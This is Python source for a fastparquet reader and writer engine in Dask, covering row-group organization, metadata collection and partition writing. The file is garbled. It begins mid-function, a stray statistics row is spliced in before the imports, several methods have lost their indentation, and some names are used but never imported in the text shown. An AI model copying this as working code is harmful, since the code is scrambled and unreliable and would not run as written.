                            v
                            if name.endswith("-catdef")
                            else v[start : start + thislen]
                        )
                        for (name, v) in views.items()
                    }

                    # Add row-group data to df
                    pf.read_row_group_file(
                        rg,
                        columns,
                        categories,
                        index,
                        assign=parts,
                        partition_meta=pf.partition_meta,
                        infile=infile,
                        **kwargs,
                    )
                    start += thislen
        return df
    @classmethod
    def initialize_write(
        cls,
        df,
        fs,
        path,
        append=False,
        partition_on=None,
        ignore_divisions=False,
        division_info=None,
        schema=None,
        object_encoding="utf8",
        index_cols=None,
        custom_metadata=None,
        **kwargs,
    ):
        """Prepare a dataset directory for writing with fastparquet.

        Creates ``path``, builds (or, for ``append=True``, loads and
        validates) the thrift file-metadata object, and returns
        ``(i_offset, fmd, metadata_file_exists, extra_write_kwargs)``.

        ``schema`` is accepted for engine-interface compatibility but is
        not used in this implementation.
        """
        if index_cols is None:
            index_cols = []
        if append and division_info is None:
            ignore_divisions = True
        fs.mkdirs(path, exist_ok=True)

        if object_encoding == "infer" or (
            isinstance(object_encoding, dict) and "infer" in object_encoding.values()
        ):
            raise ValueError(
                '"infer" not allowed as object encoding, '
                "because this required data in memory."
            )

        metadata_file_exists = False
        if append:
            try:
                # to append to a dataset without _metadata, need to load
                # _common_metadata or any data file here
                pf = fastparquet.api.ParquetFile(path, open_with=fs.open)
                metadata_file_exists = fs.exists(fs.sep.join([path, "_metadata"]))
            except (OSError, ValueError):
                # append for create
                append = False
        if append:
            # Validate that the appended frame matches the existing dataset
            if pf.file_scheme not in ["hive", "empty", "flat"]:
                raise ValueError(
                    "Requested file scheme is hive, but existing file scheme is not."
                )
            elif (set(pf.columns) != set(df.columns) - set(partition_on)) or (
                set(partition_on) != set(pf.cats)
            ):
                raise ValueError(
                    "Appended columns not the same.\n"
                    "Previous: {} | New: {}".format(pf.columns, list(df.columns))
                )
            elif (pd.Series(pf.dtypes).loc[pf.columns] != df[pf.columns].dtypes).any():
                raise ValueError(
                    "Appended dtypes differ.\n{}".format(
                        set(pf.dtypes.items()) ^ set(df.dtypes.items())
                    )
                )
            else:
                df = df[pf.columns + partition_on]

            fmd = pf.fmd
            i_offset = fastparquet.writer.find_max_part(fmd.row_groups)

            if not ignore_divisions:
                if not set(index_cols).intersection([division_info["name"]]):
                    ignore_divisions = True
            if not ignore_divisions:
                minmax = fastparquet.api.sorted_partitioned_columns(pf)
                # If fastparquet detects that a partitioned column isn't sorted, it won't
                # appear in the resulting min/max dictionary
                old_end = (
                    minmax[index_cols[0]]["max"][-1]
                    if index_cols[0] in minmax
                    else None
                )
                divisions = division_info["divisions"]
                if old_end is None or divisions[0] <= old_end:
                    raise ValueError(
                        "Appended divisions overlapping with previous ones."
                        "\n"
                        "Previous: {} | New: {}".format(old_end, divisions[0])
                    )
        else:
            fmd = fastparquet.writer.make_metadata(
                df._meta,
                object_encoding=object_encoding,
                index_cols=index_cols,
                ignore_columns=partition_on,
                **kwargs,
            )
            i_offset = 0

        if custom_metadata is not None:
            kvm = fmd.key_value_metadata or []
            kvm.extend(
                [
                    fastparquet.parquet_thrift.KeyValue(key=key, value=value)
                    for key, value in custom_metadata.items()
                ]
            )
            fmd.key_value_metadata = kvm

        extra_write_kwargs = {"fmd": fmd}
        return i_offset, fmd, metadata_file_exists, extra_write_kwargs
    @classmethod
    def write_partition(
        cls,
        df,
        path,
        fs,
        filename,
        partition_on,
        return_metadata,
        fmd=None,
        compression=None,
        custom_metadata=None,
        **kwargs,
    ):
        """Write one partition of ``df`` to storage.

        Returns the resulting row-group metadata objects when
        ``return_metadata`` is True, otherwise an empty list.
        """
        # Update key/value metadata if necessary
        fmd = copy.copy(fmd)
        for s in fmd.schema:
            if isinstance(s.name, bytes):
                # can be coerced to bytes on copy
                s.name = s.name.decode()
        # NOTE(review): `fmd is not None` is checked here, but `fmd.schema`
        # was already dereferenced above — a None `fmd` would have raised
        # earlier. Verify whether the guard is still needed.
        if custom_metadata and fmd is not None:
            fmd.key_value_metadata = fmd.key_value_metadata + (
                [
                    fastparquet.parquet_thrift.KeyValue(key=key, value=value)
                    for key, value in custom_metadata.items()
                ]
            )

        if not len(df):
            # Write nothing for empty partitions
            rgs = []
        elif partition_on:
            mkdirs = lambda x: fs.mkdirs(x, exist_ok=True)
            # Older fastparquet releases used a different
            # `partition_on_columns` signature (extra `sep` argument)
            if parse_version(fastparquet.__version__) >= parse_version("0.1.4"):
                rgs = partition_on_columns(
                    df, partition_on, path, filename, fmd, compression, fs.open, mkdirs
                )
            else:
                rgs = partition_on_columns(
                    df,
                    partition_on,
                    path,
                    filename,
                    fmd,
                    fs.sep,
                    compression,
                    fs.open,
                    mkdirs,
                )
        else:
            with fs.open(fs.sep.join([path, filename]), "wb") as fil:
                fmd.num_rows = len(df)
                rg = make_part_file(
                    fil, df, fmd.schema, compression=compression, fmd=fmd
                )
            for chunk in rg.columns:
                chunk.file_path = filename
            rgs = [rg]
        if return_metadata:
            return rgs
        else:
            return []
@classmethod
def write_metadata(cls, parts, meta, fs, path, append=False, **kwargs):
_meta = copy.copy(meta)
rgs = meta.row_groups
if parts:
for rg in parts:
if rg is not None:
if isinstance(rg, list):
for r in rg:
rgs.append(r)
else:
rgs.append(rg)
_meta.row_groups = rgs
fn = fs.sep.join([path, "_metadata"])
fastparquet.writer.write_common_metadata(
fn, _meta, open_with=fs.open, no_row_groups=False
)
# if appending, could skip this, but would need to check existence
fn = fs.sep.join([path, "_common_metadata"])
fastparquet.writer.write_common_metadata(fn, _meta, open_with=fs.open)
| 36.597372 | 96 | 0.51665 | import copy
import pickle
import threading
import warnings
from collections import OrderedDict, defaultdict
from contextlib import ExitStack
import numpy as np
import pandas as pd
import tlz as toolz
from packaging.version import parse as parse_version
from dask.core import flatten
try:
import fastparquet
from fastparquet import ParquetFile
from fastparquet.util import ex_from_sep, get_file_scheme, groupby_types, val_to_num
from fastparquet.writer import make_part_file, partition_on_columns
except ImportError:
pass
from dask.base import tokenize
def _paths_to_cats(paths, file_scheme):
    """Extract ``{field: [values]}`` partition info from a list of paths.

    For ``file_scheme == "hive"`` the fields come from ``key=value``
    directory components; otherwise positional directories are named
    ``dir0``, ``dir1``, ....  Raises ``ValueError`` when distinct raw
    labels coerce to the same value, and warns when labels coerce to
    mixed types.

    NOTE: the original ``def`` line was corrupted in this copy
    (truncated to ``heme):``); the signature is reconstructed from the
    body and the ``paths_to_cats(fns, scheme)`` call sites.
    """
    if file_scheme in ["simple", "flat", "other"]:
        cats = {}
        return cats

    cats = OrderedDict()
    raw_cats = OrderedDict()
    s = ex_from_sep("/")
    paths = toolz.unique(paths)
    if file_scheme == "hive":
        partitions = toolz.unique((k, v) for path in paths for k, v in s.findall(path))
        for key, val in partitions:
            cats.setdefault(key, set()).add(val_to_num(val))
            raw_cats.setdefault(key, set()).add(val)
    else:
        i_val = toolz.unique(
            (i, val) for path in paths for i, val in enumerate(path.split("/")[:-1])
        )
        for i, val in i_val:
            key = "dir%i" % i
            cats.setdefault(key, set()).add(val_to_num(val))
            raw_cats.setdefault(key, set()).add(val)

    for key, v in cats.items():
        raw = raw_cats[key]
        if len(v) != len(raw):
            # Two different raw labels coerced to one value -> ambiguous
            conflicts_by_value = OrderedDict()
            for raw_val in raw_cats[key]:
                conflicts_by_value.setdefault(val_to_num(raw_val), set()).add(raw_val)
            conflicts = [
                c for k in conflicts_by_value.values() if len(k) > 1 for c in k
            ]
            raise ValueError("Partition names map to the same value: %s" % conflicts)
        vals_by_type = groupby_types(v)

        if len(vals_by_type) > 1:
            examples = [x[0] for x in vals_by_type.values()]
            warnings.warn(
                "Partition names coerce to values of different types, e.g. %s"
                % examples
            )

    cats = OrderedDict([(key, list(v)) for key, v in cats.items()])
    return cats
# NOTE(review): module-level alias — presumably kept so external code
# importing `paths_to_cats` keeps working; confirm against release history.
paths_to_cats = (
    _paths_to_cats
)
class FastParquetEngine(Engine):
    @classmethod
    def _organize_row_groups(
        cls,
        pf,
        split_row_groups,
        gather_statistics,
        stat_col_indices,
        filters,
        dtypes,
        base_path,
        has_metadata_file,
        chunksize,
        aggregation_depth,
    ):
        """Group ``pf.row_groups`` by file and (optionally) collect stats.

        Returns ``(file_row_groups, file_row_group_stats,
        file_row_group_column_stats, gather_statistics, base_path)``.
        ``gather_statistics`` may be demoted to False mid-scan when stats
        are only needed for divisions and turn out to be unusable.
        """
        pqpartitions = list(pf.cats)
        # Re-sort by path when hive-partitioned data must be aggregated,
        # so file-adjacent row-groups stay adjacent
        if (
            pqpartitions
            and aggregation_depth
            and pf.row_groups
            and pf.row_groups[0].columns[0].file_path
        ):
            pf.row_groups = sorted(
                pf.row_groups,
                key=lambda x: natural_sort_key(x.columns[0].file_path),
            )
        # Map field name -> pandas_type from the pandas metadata (used to
        # decide whether byte statistics should be utf-8 decoded)
        pandas_type = {}
        if pf.row_groups and pf.pandas_metadata:
            for c in pf.pandas_metadata.get("columns", []):
                if "field_name" in c:
                    pandas_type[c["field_name"]] = c.get("pandas_type", None)
        single_rg_parts = int(split_row_groups) == 1
        file_row_groups = defaultdict(list)
        file_row_group_stats = defaultdict(list)
        file_row_group_column_stats = defaultdict(list)
        cmax_last = {}
        for rg, row_group in enumerate(pf.row_groups):
            # Filter on hive-partition values without touching statistics
            if (
                pqpartitions
                and filters
                and fastparquet.api.filter_out_cats(row_group, filters)
            ):
                continue

            fp = row_group.columns[0].file_path
            fpath = fp.decode() if isinstance(fp, bytes) else fp
            if fpath is None:
                if not has_metadata_file:
                    # row group is in the same file as the metadata.
                    # Assume this is a single-file dataset.
                    fpath = pf.fn
                    base_path = base_path or ""
                else:
                    raise ValueError(
                        "Global metadata structure is missing a file_path string. "
                        "If the dataset includes a _metadata file, that file may "
                        "have one or more missing file_path fields."
                    )

            # Append a tuple to file_row_groups. This tuple will
            # be structured as: `(<local-row-group-id>, <global-row-group-id>)`
            if file_row_groups[fpath]:
                file_row_groups[fpath].append((file_row_groups[fpath][-1][0] + 1, rg))
            else:
                file_row_groups[fpath].append((0, rg))

            if gather_statistics:
                if single_rg_parts:
                    s = {
                        "file_path_0": fpath,
                        "num-rows": row_group.num_rows,
                        "total_byte_size": row_group.total_byte_size,
                        "columns": [],
                    }
                else:
                    s = {
                        "num-rows": row_group.num_rows,
                        "total_byte_size": row_group.total_byte_size,
                    }
                cstats = []
                for name, i in stat_col_indices.items():
                    column = row_group.columns[i]
                    if column.meta_data.statistics:
                        cmin = None
                        cmax = None
                        # TODO: Avoid use of `pf.statistics`
                        if pf.statistics["min"][name][0] is not None:
                            cmin = pf.statistics["min"][name][rg]
                            cmax = pf.statistics["max"][name][rg]
                        elif dtypes[name] == "object":
                            cmin = column.meta_data.statistics.min_value
                            cmax = column.meta_data.statistics.max_value
                            # Older versions may not have cmin/cmax_value
                            if cmin is None:
                                cmin = column.meta_data.statistics.min
                            if cmax is None:
                                cmax = column.meta_data.statistics.max
                        # Decode bytes as long as "bytes" is not the
                        # expected `pandas_type` for this column
                        if (
                            isinstance(cmin, (bytes, bytearray))
                            and pandas_type.get(name, None) != "bytes"
                        ):
                            cmin = cmin.decode("utf-8")
                            cmax = cmax.decode("utf-8")
                        if isinstance(cmin, np.datetime64):
                            tz = getattr(dtypes[name], "tz", None)
                            cmin = pd.Timestamp(cmin, tz=tz)
                            cmax = pd.Timestamp(cmax, tz=tz)
                        last = cmax_last.get(name, None)

                        if not (filters or chunksize or aggregation_depth):
                            # Only think about bailing if we don't need
                            if cmin is None or (last and cmin < last):
                                # we have an all-null partition, so lets bail.
                                #
                                # Note: This assumes ascending order.
                                #
                                gather_statistics = False
                                file_row_group_stats = {}
                                file_row_group_column_stats = {}
                                break

                        if single_rg_parts:
                            s["columns"].append(
                                {
                                    "name": name,
                                    "min": cmin,
                                    "max": cmax,
                                }
                            )
                        else:
                            cstats += [cmin, cmax]
                        cmax_last[name] = cmax
                    else:
                        if (
                            not (filters or chunksize or aggregation_depth)
                            and column.meta_data.num_values > 0
                        ):
                            # We are collecting statistics for divisions
                            # only (no filters) - Lets bail.
                            gather_statistics = False
                            file_row_group_stats = {}
                            file_row_group_column_stats = {}
                            break

                        if single_rg_parts:
                            s["columns"].append({"name": name})
                        else:
                            # NOTE(review): three placeholders here vs the
                            # two values (`[cmin, cmax]`) appended in the
                            # stats branch — verify against
                            # `_row_groups_to_parts` expectations.
                            cstats += [None, None, None]
                if gather_statistics:
                    file_row_group_stats[fpath].append(s)
                    if not single_rg_parts:
                        file_row_group_column_stats[fpath].append(tuple(cstats))

        return (
            file_row_groups,
            file_row_group_stats,
            file_row_group_column_stats,
            gather_statistics,
            base_path,
        )
    @classmethod
    def _get_thrift_row_groups(
        cls,
        pf,
        filename,
        row_groups,
    ):
        """Return the real thrift row-group objects for ``row_groups``,
        stripped of metadata that is not needed at read time.

        ``row_groups`` is a list of ``(local_id, global_id)`` tuples;
        ``global_id`` indexes into ``pf.row_groups``.
        """
        real_row_groups = []
        for rg, rg_global in row_groups:
            row_group = pf.row_groups[rg_global]
            columns = row_group.columns
            for c, col in enumerate(columns):
                if c:
                    # Only the first column chunk keeps its file_path
                    col.file_path = None
                md = col.meta_data
                md.key_value_metadata = None
                # NOTE: Fastparquet may need the null count in the
                # statistics, so we cannot just set statistics
                # to none. Set attributes separately:
                st = md.statistics
                if st:
                    st.distinct_count = None
                    st.max = None
                    st.min = None
                    st.max_value = None
                    st.min_value = None
                md.encodings = None
                md.total_uncompressed_size = None
                md.encoding_stats = None
            row_group.columns = columns
            real_row_groups.append(row_group)
        return real_row_groups
@classmethod
def _make_part(
cls,
filename,
rg_list,
fs=None,
pf=None,
base_path=None,
partitions=None,
):
if partitions:
real_row_groups = cls._get_thrift_row_groups(
pf,
filename,
rg_list,
)
part = {"piece": (real_row_groups,)}
else:
# Get full path (empty strings should be ignored)
full_path = fs.sep.join([p for p in [base_path, filename] if p != ""])
row_groups = [rg[0] for rg in rg_list] # Don't need global IDs
part = {"piece": (full_path, row_groups)}
return part
    @classmethod
    def _collect_dataset_info(
        cls,
        paths,
        fs,
        categories,
        index,
        gather_statistics,
        filters,
        split_row_groups,
        chunksize,
        aggregate_files,
        ignore_metadata_file,
        metadata_task_size,
        parquet_file_extension,
        kwargs,
    ):
        """Stage 1 of ``read_metadata``: open the dataset and gather
        global information into a single ``dataset_info`` dict.

        Handles both a single-directory input and an explicit file list,
        with or without a ``_metadata`` file.
        """
        dataset_kwargs, read_kwargs, user_kwargs = _split_user_options(**kwargs)

        parts = []
        _metadata_exists = False
        if len(paths) == 1 and fs.isdir(paths[0]):
            # Single-directory input
            base = paths[0]
            _metadata_exists = True
            if not ignore_metadata_file:
                _metadata_exists = fs.isfile(fs.sep.join([base, "_metadata"]))

            if ignore_metadata_file or not _metadata_exists:
                # Enumerate data files; drop metadata sidecar files
                paths, base, fns = _sort_and_analyze_paths(fs.find(base), fs)
                _update_paths = False
                for fn in ["_metadata", "_common_metadata"]:
                    try:
                        fns.remove(fn)
                        _update_paths = True
                    except ValueError:
                        pass
                if _update_paths:
                    paths = [fs.sep.join([base, fn]) for fn in fns]
                _metadata_exists = False
            if _metadata_exists:
                pf = ParquetFile(
                    fs.sep.join([base, "_metadata"]),
                    open_with=fs.open,
                    **dataset_kwargs,
                )
            else:
                if parquet_file_extension:
                    # Need to materialize all paths if we are missing the
                    # "_metadata" file, then apply the extension filter
                    len0 = len(paths)
                    paths = [
                        path for path in paths if path.endswith(parquet_file_extension)
                    ]
                    if len0 and paths == []:
                        raise ValueError(
                            "No files satisfy the `parquet_file_extension` criteria "
                            f"(files must end with {parquet_file_extension})."
                        )
                pf = ParquetFile(
                    paths[:1], open_with=fs.open, root=base, **dataset_kwargs
                )
                scheme = get_file_scheme(fns)
                pf.file_scheme = scheme
                pf.cats = paths_to_cats(fns, scheme)
                if not gather_statistics:
                    parts = [fs.sep.join([base, fn]) for fn in fns]
        else:
            # Explicit list of files
            paths, base, fns = _sort_and_analyze_paths(paths, fs)
            _metadata_exists = "_metadata" in fns
            if _metadata_exists and ignore_metadata_file:
                fns.remove("_metadata")
                _metadata_exists = False
            paths = [fs.sep.join([base, fn]) for fn in fns]

            if _metadata_exists:
                pf = ParquetFile(
                    fs.sep.join([base, "_metadata"]),
                    open_with=fs.open,
                    **dataset_kwargs,
                )
            else:
                scheme = get_file_scheme(fns)
                pf = ParquetFile(
                    paths[:1], open_with=fs.open, root=base, **dataset_kwargs
                )
                pf.file_scheme = scheme
                pf.cats = paths_to_cats(fns, scheme)
                if not gather_statistics:
                    parts = paths.copy()

        aggregation_depth = _get_aggregation_depth(
            aggregate_files,
            list(pf.cats),
        )

        # Partition columns must either all be written in the file or
        # all come from the directory structure — never a mix
        if pf.cats:
            _partitions = [p for p in pf.cats if p not in pf.columns]
            if not _partitions:
                pf.cats = {}
            elif len(_partitions) != len(pf.cats):
                raise ValueError(
                    "No partition-columns should be written in the \n"
                    "file unless they are ALL written in the file.\n"
                    "columns: {} | partitions: {}".format(pf.columns, pf.cats.keys())
                )

        return {
            "pf": pf,
            "paths": paths,
            "has_metadata_file": _metadata_exists,
            "parts": parts,
            "base": base,
            "fs": fs,
            "gather_statistics": gather_statistics,
            "categories": categories,
            "index": index,
            "filters": filters,
            "split_row_groups": split_row_groups,
            "chunksize": chunksize,
            "aggregate_files": aggregate_files,
            "aggregation_depth": aggregation_depth,
            "metadata_task_size": metadata_task_size,
            "kwargs": {
                "dataset": dataset_kwargs,
                "read": read_kwargs,
                **user_kwargs,
            },
        }
    @classmethod
    def _create_dd_meta(cls, dataset_info):
        """Stage 2 of ``read_metadata``: build the empty pandas frame
        (``meta``) describing the output collection's schema.

        Also resolves index/categories choices and records them back
        into ``dataset_info`` for later stages.
        """
        pf = dataset_info["pf"]
        index = dataset_info["index"]
        categories = dataset_info["categories"]
        columns = None

        pandas_md = pf.pandas_metadata
        if pandas_md:
            (
                index_names,
                column_names,
                storage_name_mapping,
                column_index_names,
            ) = _parse_pandas_metadata(pandas_md)
            column_names.extend(pf.cats)
        else:
            index_names = []
            column_names = pf.columns + list(pf.cats)
            storage_name_mapping = {k: k for k in column_names}
            column_index_names = [None]
        if index is None and len(index_names) > 0:
            # Use the pandas-metadata index when the user gave none
            if len(index_names) == 1 and index_names[0] is not None:
                index = index_names[0]
            else:
                index = index_names

        column_names, index_names = _normalize_index_columns(
            columns, column_names, index, index_names
        )
        all_columns = index_names + column_names

        categories_dict = None
        if isinstance(categories, dict):
            categories_dict = categories

        if categories is None:
            categories = pf.categories
        elif isinstance(categories, str):
            categories = [categories]
        else:
            categories = list(categories)
        if categories and not set(categories).intersection(all_columns):
            raise ValueError(
                "categories not in available columns.\n"
                "categories: {} | columns: {}".format(categories, list(all_columns))
            )

        dtypes = pf._dtypes(categories)
        dtypes = {storage_name_mapping.get(k, k): v for k, v in dtypes.items()}

        index_cols = index or ()
        if isinstance(index_cols, str):
            index_cols = [index_cols]
        for ind in index_cols:
            # Downcast extension dtypes for index columns where possible
            if getattr(dtypes.get(ind), "numpy_dtype", None):
                dtypes[ind] = dtypes[ind].numpy_dtype
        for cat in categories:
            if cat in all_columns:
                dtypes[cat] = pd.CategoricalDtype(categories=[UNKNOWN_CATEGORIES])

        for catcol in pf.cats:
            if catcol in all_columns:
                dtypes[catcol] = pd.CategoricalDtype(categories=pf.cats[catcol])

        meta = _meta_from_dtypes(all_columns, dtypes, index_cols, column_index_names)

        # Record the resolved settings for later stages
        dataset_info["dtypes"] = dtypes
        dataset_info["index"] = index
        dataset_info["index_cols"] = index_cols
        dataset_info["categories"] = categories
        dataset_info["categories_dict"] = categories_dict

        return meta
    @classmethod
    def _construct_collection_plan(cls, dataset_info):
        """Stage 3 of ``read_metadata``: build the output-partition plan.

        Returns ``(parts, stats, common_kwargs)``.  Metadata collection
        is fanned out as Dask tasks when there is no ``_metadata`` file
        and ``metadata_task_size`` allows it.
        """
        fs = dataset_info["fs"]
        parts = dataset_info["parts"]
        paths = dataset_info["paths"]
        filters = dataset_info["filters"]
        pf = dataset_info["pf"]
        split_row_groups = dataset_info["split_row_groups"]
        chunksize = dataset_info["chunksize"]
        gather_statistics = dataset_info["gather_statistics"]
        base_path = dataset_info["base"]
        aggregation_depth = dataset_info["aggregation_depth"]
        index_cols = dataset_info["index_cols"]
        categories = dataset_info["categories"]
        dtypes = dataset_info["dtypes"]
        categories_dict = dataset_info["categories_dict"]
        has_metadata_file = dataset_info["has_metadata_file"]
        metadata_task_size = dataset_info["metadata_task_size"]
        kwargs = dataset_info["kwargs"]

        # Resolve the effective metadata task size for this filesystem
        # (overwrites the raw value unpacked above)
        metadata_task_size = _set_metadata_task_size(
            dataset_info["metadata_task_size"], fs
        )

        # Determine which columns need statistics
        filter_columns = {t[0] for t in flatten(filters or [], container=list)}
        stat_col_indices = {}
        _index_cols = index_cols if (gather_statistics and len(index_cols) == 1) else []
        for i, name in enumerate(pf.columns):
            if name in _index_cols or name in filter_columns:
                stat_col_indices[name] = i

        gather_statistics = _set_gather_statistics(
            gather_statistics,
            chunksize,
            split_row_groups,
            aggregation_depth,
            filter_columns,
            set(stat_col_indices) | filter_columns,
        )

        # Kwargs shared by every read_partition call
        common_kwargs = {
            "categories": categories_dict or categories,
            "root_cats": pf.cats,
            "root_file_scheme": pf.file_scheme,
            "base_path": base_path,
            **kwargs,
        }

        # Fast path: one part per file, no stats needed
        if (
            gather_statistics is False
            and not split_row_groups
            and isinstance(parts, list)
            and len(parts)
            and isinstance(parts[0], str)
        ):
            return (
                [{"piece": (full_path, None)} for full_path in parts],
                [],
                common_kwargs,
            )

        dataset_info_kwargs = {
            "fs": fs,
            "split_row_groups": split_row_groups,
            "gather_statistics": gather_statistics,
            "filters": filters,
            "dtypes": dtypes,
            "stat_col_indices": stat_col_indices,
            "aggregation_depth": aggregation_depth,
            "chunksize": chunksize,
            "root_cats": pf.cats,
            "root_file_scheme": pf.file_scheme,
            "base_path": "" if base_path is None else base_path,
            "has_metadata_file": has_metadata_file,
        }

        if (
            has_metadata_file
            or metadata_task_size == 0
            or metadata_task_size > len(paths)
        ):
            # Process the global metadata (or all paths) locally
            pf_or_paths = pf if has_metadata_file else paths
            parts, stats = cls._collect_file_parts(pf_or_paths, dataset_info_kwargs)
        else:
            # We should loop over files in parallel
            parts, stats = [], []
            if paths:
                # Build and compute a task graph to construct stats/parts
                gather_parts_dsk = {}
                name = "gather-pq-parts-" + tokenize(paths, dataset_info_kwargs)
                finalize_list = []
                for task_i, file_i in enumerate(
                    range(0, len(paths), metadata_task_size)
                ):
                    finalize_list.append((name, task_i))
                    gather_parts_dsk[finalize_list[-1]] = (
                        cls._collect_file_parts,
                        paths[file_i : file_i + metadata_task_size],
                        dataset_info_kwargs,
                    )

                def _combine_parts(parts_and_stats):
                    # Concatenate the per-task (parts, stats) results
                    parts, stats = [], []
                    for part, stat in parts_and_stats:
                        parts += part
                        if stat:
                            stats += stat
                    return parts, stats

                gather_parts_dsk["final-" + name] = (_combine_parts, finalize_list)
                parts, stats = Delayed("final-" + name, gather_parts_dsk).compute()

        return parts, stats, common_kwargs
    @classmethod
    def _collect_file_parts(
        cls,
        pf_or_files,
        dataset_info_kwargs,
    ):
        """Build output-partition descriptors ("parts") and statistics.

        Accepts either a global ``fastparquet.ParquetFile`` object or a
        list of file paths (``pf_or_files``), plus the planning options
        packed into ``dataset_info_kwargs``, and returns ``(parts, stats)``
        for the corresponding row-groups.  May execute inside a Dask task
        when metadata is processed in parallel.
        """
        # Collect necessary information from dataset_info
        fs = dataset_info_kwargs["fs"]
        split_row_groups = dataset_info_kwargs["split_row_groups"]
        gather_statistics = dataset_info_kwargs["gather_statistics"]
        stat_col_indices = dataset_info_kwargs["stat_col_indices"]
        filters = dataset_info_kwargs["filters"]
        dtypes = dataset_info_kwargs["dtypes"]
        chunksize = dataset_info_kwargs["chunksize"]
        aggregation_depth = dataset_info_kwargs["aggregation_depth"]
        base_path = dataset_info_kwargs.get("base_path", None)
        root_cats = dataset_info_kwargs.get("root_cats", None)
        root_file_scheme = dataset_info_kwargs.get("root_file_scheme", None)
        has_metadata_file = dataset_info_kwargs["has_metadata_file"]

        # Get ParquetFile
        if not isinstance(pf_or_files, fastparquet.api.ParquetFile):
            # Construct local `ParquetFile` object
            pf = ParquetFile(
                pf_or_files,
                open_with=fs.open,
                root=base_path,
            )
            # Update hive-partitioning to match global cats/scheme
            pf.cats = root_cats or {}
            if root_cats:
                pf.file_scheme = root_file_scheme
        else:
            # We already have a ParquetFile object to work with
            pf = pf_or_files

        # Organize row-groups by file
        (
            file_row_groups,
            file_row_group_stats,
            file_row_group_column_stats,
            gather_statistics,
            base_path,
        ) = cls._organize_row_groups(
            pf,
            split_row_groups,
            gather_statistics,
            stat_col_indices,
            filters,
            dtypes,
            base_path,
            has_metadata_file,
            chunksize,
            aggregation_depth,
        )

        # Convert organized row-groups to parts
        parts, stats = _row_groups_to_parts(
            gather_statistics,
            split_row_groups,
            aggregation_depth,
            file_row_groups,
            file_row_group_stats,
            file_row_group_column_stats,
            stat_col_indices,
            cls._make_part,
            make_part_kwargs={
                "fs": fs,
                "pf": pf,
                "base_path": base_path,
                "partitions": list(pf.cats),
            },
        )
        return parts, stats
    @classmethod
    def read_metadata(
        cls,
        fs,
        paths,
        categories=None,
        index=None,
        gather_statistics=None,
        filters=None,
        split_row_groups=False,
        chunksize=None,
        aggregate_files=None,
        ignore_metadata_file=False,
        metadata_task_size=None,
        parquet_file_extension=None,
        **kwargs,
    ):
        """Engine entry point: plan a dask DataFrame read of a dataset.

        Runs three stages (collect dataset info, build the empty ``meta``
        frame, construct the partition plan) and returns the
        ``(meta, stats, parts, index)`` tuple the engine API expects.
        """
        # Stage 1: Collect general dataset information
        dataset_info = cls._collect_dataset_info(
            paths,
            fs,
            categories,
            index,
            gather_statistics,
            filters,
            split_row_groups,
            chunksize,
            aggregate_files,
            ignore_metadata_file,
            metadata_task_size,
            parquet_file_extension,
            kwargs,
        )

        # Stage 2: Generate output `meta`
        meta = cls._create_dd_meta(dataset_info)

        # Stage 3: Generate parts and stats
        parts, stats, common_kwargs = cls._construct_collection_plan(dataset_info)

        # Cannot allow `None` in columns if the user has specified index=False
        index = dataset_info["index"]
        if index is False and None in meta.columns:
            meta.drop(columns=[None], inplace=True)

        # Add `common_kwargs` to the first element of `parts`.
        # We can return as a separate element in the future, but
        # should avoid breaking the API for now.
        if len(parts):
            parts[0]["common_kwargs"] = common_kwargs
            parts[0]["aggregation_depth"] = dataset_info["aggregation_depth"]

        if len(parts) and len(parts[0]["piece"]) == 1:
            # Strip all partition-dependent or unnecessary
            # data from the `ParquetFile` object
            pf = dataset_info["pf"]
            pf.row_groups = None
            pf.fmd.row_groups = None
            pf._statistics = None
            parts[0]["common_kwargs"]["parquet_file"] = pf

        return (meta, stats, parts, index)
@classmethod
def multi_support(cls):
return cls == FastParquetEngine
    @classmethod
    def read_partition(
        cls,
        fs,
        pieces,
        columns,
        index,
        categories=(),
        root_cats=None,
        root_file_scheme=None,
        base_path=None,
        **kwargs,
    ):
        """Read one output partition (one or more "pieces") into pandas.

        Each piece is a tuple of either ``(path, row_group_ids)`` or
        ``(row_group_objects, ...)`` when a global ``parquet_file`` was
        shipped in ``kwargs`` by ``read_metadata``.
        """
        null_index_name = False
        base_path = False if not root_cats else base_path

        if isinstance(index, list):
            if index == [None]:
                # Handling a None-labeled index...
                # The pandas metadata told us to read in an index
                # labeled `None`. If this corresponds to a `RangeIndex`,
                # fastparquet will need use the pandas metadata to
                # construct the index. Otherwise, the index will correspond
                # to a column named "__index_level_0__". We will need to
                # check the `ParquetFile` object for this column below.
                index = []
                null_index_name = True
            columns += index

        # Use global `parquet_file` object. Need to reattach
        # the desired row_group
        parquet_file = kwargs.pop("parquet_file", None)

        # Always convert pieces to list
        if not isinstance(pieces, list):
            pieces = [pieces]

        sample = pieces[0]
        if isinstance(sample, tuple):
            if isinstance(sample[0], str):
                # We have paths to read from
                assert parquet_file is None

                row_groups = []
                rg_offset = 0
                parquet_file = ParquetFile(
                    [p[0] for p in pieces],
                    open_with=fs.open,
                    root=base_path or False,
                    **kwargs.get("dataset", {}),
                )
                for piece in pieces:
                    # Map each piece's local row-group ids onto the global
                    # ids of the combined `parquet_file` built above
                    _pf = (
                        parquet_file
                        if len(pieces) == 1
                        else ParquetFile(
                            piece[0],
                            open_with=fs.open,
                            root=base_path or False,
                            **kwargs.get("dataset", {}),
                        )
                    )
                    n_local_row_groups = len(_pf.row_groups)
                    local_rg_indices = piece[1] or list(range(n_local_row_groups))
                    row_groups += [
                        parquet_file.row_groups[rg + rg_offset]
                        for rg in local_rg_indices
                    ]
                    rg_offset += n_local_row_groups
                update_parquet_file = len(row_groups) < len(parquet_file.row_groups)

            elif parquet_file:
                row_groups = []
                for piece in pieces:
                    # `piece[1]` will contain actual row-group objects,
                    # but they may be pickled
                    rgs = piece[0]
                    if isinstance(rgs, bytes):
                        rgs = pickle.loads(rgs)
                    row_groups += rgs
                update_parquet_file = True

            else:
                raise ValueError("Neither path nor ParquetFile detected!")

            if update_parquet_file:
                # Mutating the shared ParquetFile; serialize under the lock
                with _FP_FILE_LOCK:
                    for rg in row_groups:
                        for chunk in rg.columns:
                            s = chunk.file_path
                            if s and isinstance(s, bytes):
                                chunk.file_path = s.decode()
                    parquet_file.fmd.row_groups = row_groups

                    # NOTE: May lose cats after `_set_attrs` call
                    save_cats = parquet_file.cats
                    parquet_file._set_attrs()
                    parquet_file.cats = save_cats

            if null_index_name:
                if "__index_level_0__" in parquet_file.columns:
                    # See "Handling a None-labeled index" comment above
                    index = ["__index_level_0__"]
                    columns += index

            # Update hive-partitioning information if necessary
            parquet_file.cats = root_cats or {}
            if root_cats:
                parquet_file.file_scheme = root_file_scheme

            parquet_file._dtypes = (
